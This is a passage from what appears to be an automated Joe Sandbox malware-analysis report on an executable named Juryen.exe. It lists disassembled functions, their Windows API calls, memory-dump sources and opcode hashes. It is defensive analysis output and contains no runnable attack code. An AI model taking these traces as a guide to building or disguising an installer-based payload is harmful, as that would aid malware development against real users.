                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction ID: eb17948d85696e98a42b5b2e026cdebc0bad80675354e43e8e08d2e827efe14e
                                                                    • Opcode Fuzzy Hash: 24d559174ba8d1ea0ff588d178efc5a8b4b5bc163578ff463a4868f6c49c4eb4
                                                                    • Instruction Fuzzy Hash: 94213B72D00119AFCB05DF98DE45AEEBBB5EB08300F14003AF945F62A0D7349D81DB98
                                                                    Function 1F757153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1F75715C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1F75717F
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 1F7571A5
                                                                    • _free.LIBCMT ref: 1F7571B8
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 1F7571C7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: 865bbc0e05d9b8644c416bb6cc7b4ccca0079edd6b9087e577f47e8b2601b7f2
                                                                    • Instruction ID: 92153c0604365f275cbf65b6b4b2e057e78b3c87eeabd28f4cf766633f742e42
                                                                    • Opcode Fuzzy Hash: 865bbc0e05d9b8644c416bb6cc7b4ccca0079edd6b9087e577f47e8b2601b7f2
                                                                    • Instruction Fuzzy Hash: 2A01AC766052297F6B110AB66C8CDBFA96DDFC6BB0311012EFD08C7220EE619C1385F0
                                                                    Function 1F755B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000000,1F75636D,1F755713,00000000,?,1F752249,?,?,1F751D66,00000000,?,?,00000000), ref: 1F755B7F
                                                                    • _free.LIBCMT ref: 1F755BB4
                                                                    • _free.LIBCMT ref: 1F755BDB
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F755BE8
                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F755BF1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_free
                                                                    • String ID:
                                                                    • API String ID: 3170660625-0
                                                                    • Opcode ID: 3595b842fedb2da8524a5eb3ce44474e37a4dcfba0790c6818ec0e14983476a4
                                                                    • Instruction ID: ceb6ed226b0bcd0b646d94fb35ba96aa55c09c6f8b89e7da4e1c3e848e42f008
                                                                    • Opcode Fuzzy Hash: 3595b842fedb2da8524a5eb3ce44474e37a4dcfba0790c6818ec0e14983476a4
                                                                    • Instruction Fuzzy Hash: 7901C87A105712B7E20256347CCCD5F2A6A9FCA67C7210129F819DA271EF65F81B41A4
                                                                    Function 00401E73 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401E76
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                    • String ID:
                                                                    • API String ID: 3808545654-0
                                                                    • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                    • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                    • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                    Function 1F751E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751E9A
                                                                    • lstrcatW.KERNEL32(?,?,?,1F7510DF,?,?,?,00000000), ref: 1F751EAC
                                                                    • lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EB3
                                                                    • lstrlenW.KERNEL32(?,?,1F7510DF,?,?,?,00000000), ref: 1F751EC8
                                                                    • lstrcatW.KERNEL32(?,1F7510DF,?,1F7510DF,?,?,?,00000000), ref: 1F751ED3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat
                                                                    • String ID:
                                                                    • API String ID: 493641738-0
                                                                    • Opcode ID: 2163e86f95b7f2389b020ea241644b5d620b91aa4fd3402d4ad331b583f0025c
                                                                    • Instruction ID: 092baf31b29be7375fb7ed03193e8e9400497d8511b2a26ada60bb18f9e92451
                                                                    • Opcode Fuzzy Hash: 2163e86f95b7f2389b020ea241644b5d620b91aa4fd3402d4ad331b583f0025c
                                                                    • Instruction Fuzzy Hash: 8EF089265042207AD7212719ACC5EBF777CEFC9A71F44001EF50C831A0AB55686792B5
                                                                    Function 1F7591B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F7591D0
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F7591E2
                                                                    • _free.LIBCMT ref: 1F7591F4
                                                                    • _free.LIBCMT ref: 1F759206
                                                                    • _free.LIBCMT ref: 1F759218
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 96a08e67fa1ec594dbd50ee0349cdb8f7f957d2669c34a1f1eee702e7a0c78d0
                                                                    • Instruction ID: c76668b0bffd53bfcdcbba295b678d983610b22aa3c7da923cfec475219e4cb3
                                                                    • Opcode Fuzzy Hash: 96a08e67fa1ec594dbd50ee0349cdb8f7f957d2669c34a1f1eee702e7a0c78d0
                                                                    • Instruction Fuzzy Hash: 5DF036B1514360D7D650DB54F9C9C567BF9FA8D7347504C06F84ADB610DB35F890CAA0
                                                                    Function 1F755351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F75536F
                                                                      • Part of subcall function 1F75571E: HeapFree.KERNEL32(00000000,00000000,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?), ref: 1F755734
                                                                      • Part of subcall function 1F75571E: GetLastError.KERNEL32(?,?,1F75924F,?,00000000,?,00000000,?,1F759276,?,00000007,?,?,1F757E5A,?,?), ref: 1F755746
                                                                    • _free.LIBCMT ref: 1F755381
                                                                    • _free.LIBCMT ref: 1F755394
                                                                    • _free.LIBCMT ref: 1F7553A5
                                                                    • _free.LIBCMT ref: 1F7553B6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 416cb5c9a57720d94c2cfc7576c886780940a22ac2b5909fb9e750eafc4bb238
                                                                    • Instruction ID: 644f1004da6ea12fe58d390b601531655cee87d52dc3461704f95c3639aa17b7
                                                                    • Opcode Fuzzy Hash: 416cb5c9a57720d94c2cfc7576c886780940a22ac2b5909fb9e750eafc4bb238
                                                                    • Instruction Fuzzy Hash: BAF0B274825335DBE6855F34A9C44483BB2A7DDA393010A0BF814D7361EB736A62DBC0
                                                                    Function 1F754BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\Juryen.exe,00000104), ref: 1F754C1D
                                                                    • _free.LIBCMT ref: 1F754CE8
                                                                    • _free.LIBCMT ref: 1F754CF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\Juryen.exe
                                                                    • API String ID: 2506810119-3593836627
                                                                    • Opcode ID: b6da68f941daaaed8c9404d6c004008c4648042ae56e6c6cc2e980e922a60a8b
                                                                    • Instruction ID: 4b2cd616efb09929229a99be58845610a0bdf7d633c4f3c1278a1454991e70b4
                                                                    • Opcode Fuzzy Hash: b6da68f941daaaed8c9404d6c004008c4648042ae56e6c6cc2e980e922a60a8b
                                                                    • Instruction Fuzzy Hash: F13133B5B00358AFDB11CF99999499EBBFCEBC9320F10416BE90497320D671AA51CB90
                                                                    Function 00401C68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction ID: 7915d77c0e8d2f35ba529c4d8f0c1bf85837a2641dbb4ead1ffb962ccc12b17a
                                                                    • Opcode Fuzzy Hash: e5ebd0c2485f00d6c9f151be0d8d18ef0011f408847e131bf1e0c601e94fb195
                                                                    • Instruction Fuzzy Hash: CC218071D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF505B61D0D7B88941DB98
                                                                    Function 00404D6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E0E
                                                                    • wsprintfW.USER32 ref: 00404E17
                                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E2A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                    • String ID: %u.%u%s%s
                                                                    • API String ID: 3540041739-3551169577
                                                                    • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction ID: 531ff4d773969165704d770d32cd75e70745a6e311be36c98e560407ed735fca
                                                                    • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                                    • Instruction Fuzzy Hash: 1711EB73A0422837DB0056ADAC46E9E3698DF85374F250237FA66F21D5D978CC2142D8
                                                                    Function 1F7586E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,1F756FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 1F758731
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1F7587BA
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 1F7587CC
                                                                    • __freea.LIBCMT ref: 1F7587D5
                                                                      • Part of subcall function 1F7556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 1F755702
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                    • String ID:
                                                                    • API String ID: 2652629310-0
                                                                    • Opcode ID: d1b08ef9d20822cc093f67b78d325892cdc5f44976d55ca813eeef503b56d7a5
                                                                    • Instruction ID: d8fad2fcd6915b15119bb719e01bbca3ef40d5cc8aebc29cd34db65e0f2dac0b
                                                                    • Opcode Fuzzy Hash: d1b08ef9d20822cc093f67b78d325892cdc5f44976d55ca813eeef503b56d7a5
                                                                    • Instruction Fuzzy Hash: 98319E72A0021AABDF15CFB4DC84EEF7BA5EB48720F150529EC04DB1A0E735E965CB90
                                                                    Function 1F755CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,1F751D66,00000000,00000000,?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue), ref: 1F755D13
                                                                    • GetLastError.KERNEL32(?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue,1F75E190,FlsSetValue,00000000,00000364,?,1F755BC8), ref: 1F755D1F
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,1F755C88,1F751D66,00000000,00000000,00000000,?,1F755E85,00000006,FlsSetValue,1F75E190,FlsSetValue,00000000), ref: 1F755D2D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 5a9657bc460d4ef34a550e7aa85b423915f40f608400b33ce27c62480fb5d4e0
                                                                    • Instruction ID: b41d85bae7df3a9be55d5d9caa92a71b1bf44319300b9b99ea8e3665ca91e8e1
                                                                    • Opcode Fuzzy Hash: 5a9657bc460d4ef34a550e7aa85b423915f40f608400b33ce27c62480fb5d4e0
                                                                    • Instruction Fuzzy Hash: AA01A737615336ABC7114A789CCCA467758AFC97B57110631F909DB160DB31E866CAE0
                                                                    Function 0040303E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000,0040321C,00000001), ref: 00403051
                                                                    • GetTickCount.KERNEL32 ref: 0040306F
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 0040308C
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040309A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction ID: 1fe6cbc8f6a725ad0ac4e372fd1d3cf1f1d396d39c9c490f6de0fad46aa3fa9f
                                                                    • Opcode Fuzzy Hash: 33eae82cd865283ad0f9b1d758b5427aa2cdbcf5f418f2cf2359be72f6e08548
                                                                    • Instruction Fuzzy Hash: 1CF05431602621ABC6316F54FD08A9B7BA9FB44B13F41087AF045B11A9CB7948828B9C
                                                                    Function 1F7563F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 1F75655C
                                                                      • Part of subcall function 1F7562BC: IsProcessorFeaturePresent.KERNEL32(00000017,1F7562AB,00000000,?,?,?,?,00000016,?,?,1F7562B8,00000000,00000000,00000000,00000000,00000000), ref: 1F7562BE
                                                                      • Part of subcall function 1F7562BC: GetCurrentProcess.KERNEL32(C0000417), ref: 1F7562E0
                                                                      • Part of subcall function 1F7562BC: TerminateProcess.KERNEL32(00000000), ref: 1F7562E7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                    • String ID: *?$.
                                                                    • API String ID: 2667617558-3972193922
                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction ID: 99666b8531a2374fbb3c040ee1a2d27408a49e0ec1c8998a7571f9b9a1d7446d
                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                    • Instruction Fuzzy Hash: DE5193B5E0021ADFDF14CFA8EC80AADBBF5EF48314F248169D454E7364E675AA01CB50
                                                                    Function 1F7516AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: : $Se.
                                                                    • API String ID: 4218353326-4089948878
                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction ID: 88aedbf7b9fe7b122b69a2868c2595e9b2920f130c3f0d347d7752d143ef703b
                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction Fuzzy Hash: CA11CA75A00349AEDB11CFACE850BDDFBFCEF19214F104456E545E7262E6706B02C765
                                                                    Function 1F751EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1F752903
                                                                      • Part of subcall function 1F7535D2: RaiseException.KERNEL32(?,?,?,1F752925,00000000,00000000,00000000,?,?,?,?,?,1F752925,?,1F7621B8), ref: 1F753632
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 1F752920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: a4aa99d2290381f2799a51ad19c9f0de1be5c9052df7b2aac4990d8f8a4edbe3
                                                                    • Instruction ID: 6b7c5ed1573aebde27ac78c3a2cecd53acc65987e6126429fdade25077119814
                                                                    • Opcode Fuzzy Hash: a4aa99d2290381f2799a51ad19c9f0de1be5c9052df7b2aac4990d8f8a4edbe3
                                                                    • Instruction Fuzzy Hash: 59F0AF3CA0830DB78B04AAB5FC5899D776C9A14650F904664B924AA0B0FF31FA26C6C1
                                                                    Function 0040553A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00405569
                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055BA
                                                                      • Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID:
                                                                    • API String ID: 3748168415-3916222277
                                                                    • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction ID: e9ac82e17096a71ceb81da4f6da7be56a9305aae285fff99253fdd5fe3b389a1
                                                                    • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                                    • Instruction Fuzzy Hash: 6B017171200609BFDF315F11DD84AAB3A66FB84754F100037FA00B51E5C7BA8D52AE69
                                                                    Function 00406060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040607E
